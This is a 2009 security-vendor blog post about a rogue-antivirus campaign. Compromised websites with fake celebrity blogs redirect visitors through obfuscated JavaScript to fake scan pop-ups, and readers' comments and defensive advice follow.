Wednesday, September 9, 2009

Fake Blogs Serve Rogue Malware

eSoft’s Threat Prevention Team has uncovered a massive amount of recently exploited websites, all redirecting to Rogue AV malware.

At the time of writing, Google shows over 720,000 compromised URLs.  According to VirusTotal [], only two of forty-one anti-virus companies are currently detecting the malware. 

Credit also goes to Edgar ( who independently discovered and blogged about this same threat.

The compromised sites frequently contain fake blogs on the topics of entertainment and celebrities such as Britney Spears (see screenshot).


Upon visiting the site, an obfuscated javascript file redirects the visitor to the one of several sites that host the malware payload.  Multiple redirect domains are being used to further obfuscate the final destination and all of these are currently flagged as malicious by eSoft (most have been set to malicious for over a week).

Unprotected users will see a pop up window that performs a fake system scan. The user is then notified that they are infected with several threats and prompts to download the supposed cure, which is in fact the malware.  This scheme is all too common and eSoft’s Threat Prevention Team has been detecting a dramatic increase in this scam through August.  This latest appears to be the most widespread to date. 

The malware payloads change often and anti-virus detection is lagging behind.  eSoft recommends multiple layers of anti-virus at the desktop and gateway in combination with secure web filtering. A secure web filter protects users by blocking the malware distribution points even as the malware changes to evade anti-virus detection.


Edgar Bangkok said...

Many thanks for mentioning my blog in the post

Edgar from Bangkok

Mike said...

I actually got had by one of these recently. I saw the pop-up and clicked it to close it, but that very click was what infected me. People need to realize that clicking anywhere on these is like inviting the malware onto your system. If you find yourself on one of these sites and the pop-up is there, just go to your task manager (ctrl-shift-esc) and shit firefox down - that's your best bet.